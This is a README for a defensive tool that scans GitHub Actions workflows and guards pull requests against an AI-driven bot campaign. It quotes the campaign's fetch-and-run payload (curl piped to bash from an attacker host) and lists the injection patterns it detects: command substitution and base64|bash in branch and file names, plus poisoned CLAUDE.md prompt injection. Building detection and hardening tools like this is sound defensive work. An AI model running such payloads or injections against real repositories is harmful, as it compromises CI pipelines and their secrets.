anti-hackerbot-claw

Defensive tooling against the hackerbot-claw campaign — GitHub · By JOES — donated to the community.

An AI-powered bot has been exploiting GitHub Actions workflows (StepSecurity investigation). You can’t reliably “take down” the bot; you harden your repo so its exploitation patterns fail. This repo gives you two ways to fight back:

1. Workflow scanner — Find vulnerable workflow patterns (Pwn Request, comment-triggered without author check, expression injection, etc.) so you can fix them before the bot does.
2. PR guard — Run on every PR to block branch-name injection, filename injection, and known malicious payload URLs.

Table of contents

• What hackerbot-claw does · Install · Scan workflows · PR guard · Recommendation · References · License · Tags & topics

What hackerbot-claw does

• Scans public repos for exploitable GitHub Actions (e.g. pull_request_target + checkout of fork code).
• Uses 5+ techniques: Pwn Request, direct script injection, branch name injection, filename injection, AI prompt injection (poisoned CLAUDE.md).
• Payload: curl -sSfL hackmoltrepeat.com/molt | bash (and variants).
• Targets: Microsoft, DataDog, CNCF, and other high-profile repos.

Defense = automated guardrails: fix vulnerable workflows and block malicious PR content.

Install

git clone https://github.com/securityjoes/anti-hackerbot-claw.git
cd anti-hackerbot-claw
npm install

(Or fork the repo first and clone your fork.)

Quick start: node cli.js scan (scan current repo’s .github/workflows) or run node cli.js for the interactive menu.

Forkable and reusable: Donated by JOES (www.securityjoes.com). MIT-licensed — fork it, use it in your org, or copy the workflows into your repos; no signup or vendor lock-in. The scan workflow uses your GitHub org by default (repository_owner), so it works after a fork with no config change.

1. Scan workflows (local or CI)

Scan .github/workflows for the vulnerability patterns used in the campaign:

node cli.js scan
# or
npm run scan

Optional: scan a different directory, or output a report (JSON or HTML):

node cli.js scan path/to/workflows
node cli.js scan --format json                    # print JSON to stdout
node cli.js scan --format json --output /path/to/reports   # unique folder + zip
node cli.js scan --format html --output /path/to/reports   # required; unique folder + zip; password prompted
node cli.js scan --format html --output /path/to/reports --repo owner/repo --feedback-repo securityjoes/anti-hackerbot-claw

• Report output: --output is a directory. The CLI creates a unique folder (e.g. report-20260302-143022) containing report.html and report.json, then prompts for a password and creates a password-protected zip of that folder (e.g. report-20260302-143022.zip). Leave the password empty to skip creating the zip. In CI (non-TTY), set REPORT_ZIP_PASSWORD to encrypt, or leave unset to get the folder only.
• Exposure warning: If the output directory is inside a Git repository, the CLI warns that reports may be exposed if committed. Prefer a path outside the repo. .gitignore excludes report-*/ and *.zip.
• JSON: With --output, creates the unique folder with report.json (and for HTML, also report.html). Without --output, JSON is printed to stdout.
• HTML: Report includes How to fix, Copy PR description, New PR, New issue, and a Feedback section (stars + suggestions). Feedback defaults to this tool’s repo (securityjoes/anti-hackerbot-claw); override with --feedback-repo owner/repo. All fix links target the scanned repo (--repo or inferred from git).

Checks:

• PWN_REQUEST — pull_request_target + checkout of fork ref/sha + execution of repo (fork) code.
• BRANCH_NAME_INJECTION — Branch name (head ref) interpolated into shell without sanitization.
• NO_AUTHOR_CHECK — Comment-triggered workflow with no author_association (or similar) check.
• EXPRESSION_INJECTION — User-controlled or step output interpolated into shell (e.g. echo "${{ steps.x.outputs.y }}").
• FORK_CHECKOUT — Checkout of PR head with pull_request_target.
• WRITE_WITH_PRT — contents: write with pull_request_target.

Exit code: 1 if any finding; 0 if clean.

Scan another repo: clone it and pass the workflows path, or add the scan workflow to that repo so CI runs the scanner on every push/PR (no secrets needed; uses same org by default).

Scanning many repos (e.g. large orgs): run the scanner per repo and merge reports. Example (bash): clone or list repo paths, then for each run node cli.js scan /path/to/repo/.github/workflows --format json --output reports/repo-name.json. Merge the findings arrays (or aggregate summary.bySeverity / summary.byRule) for a single view. You can also add the scan workflow to every repo so each runs in CI and you collect artifacts or use the JSON in a central dashboard.

2. PR guard (branch name, filenames, diff)

Detects hackerbot-claw-style abuse in incoming PRs:

• Branch name — Command substitution / ${IFS} / base64|bash in branch name.
• Filenames — $(...) or base64 -d|bash in added/renamed file paths.
• Diff — Known payload URLs/patterns (e.g. hackmoltrepeat.com, /molt, /moult).

Run locally (e.g. with env set):

export GITHUB_HEAD_REF="your-branch-name"
export CHANGED_FILES_JSON='["path/to/file1.md","path/to/file2.sh"]'
# optional: path to diff file
node cli.js guard /path/to/pr.diff

Or use the GitHub Action so every PR is checked automatically.

Use the GitHub Action

Add a workflow that runs before any pull_request_target or comment-triggered workflow, and does not checkout the PR’s code (so the guard itself can’t be poisoned):

# .github/workflows/pr-guard.yml
name: PR Guard
on:
  pull_request:
    types: [opened, synchronize]

jobs:
  guard:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 0

      - name: Anti Hackerbot-Claw PR Guard
        uses: securityjoes/anti-hackerbot-claw@v1
        with:
          fail-on-finding: 'true'

For the guard to work as a reusable action, you’d typically use the published action securityjoes/anti-hackerbot-claw and reference it by tag. To run the guard in-repo without publishing, use a local composite step that runs the CLI (same guard logic) with GITHUB_HEAD_REF and the diff/changed files from the event.

Recommendation

1. Scan your .github/workflows with node cli.js scan and fix any reported patterns (especially Pwn Request and comment-triggered without author check).
2. Add the PR guard (Action or equivalent) so branch name injection, malicious filenames, and known payload URLs are blocked before other workflows run.
3. Use minimal permissions on workflows (e.g. contents: read where write isn’t needed) and follow StepSecurity and Anthropic’s security guidance for AI-assisted workflows.

References

• StepSecurity – hackerbot-claw: An AI-Powered Bot Exploiting GitHub Actions
• StepSecurity – Pwn Request vulnerability

License

MIT — use, fork, and redistribute with minimal restrictions. See LICENSE in the repo root.

Tags & topics

• GitHub topics (add in repo Settings → General → Topics): security, github-actions, supply-chain, ci-cd, hackerbot-claw, workflow-security, open-source.
• Releases: Tag versions (e.g. v1.0.0) so users can pin uses: securityjoes/anti-hackerbot-claw@v1 in workflows. Create a release in GitHub with the same tag and attach the JSON report format or changelog if needed.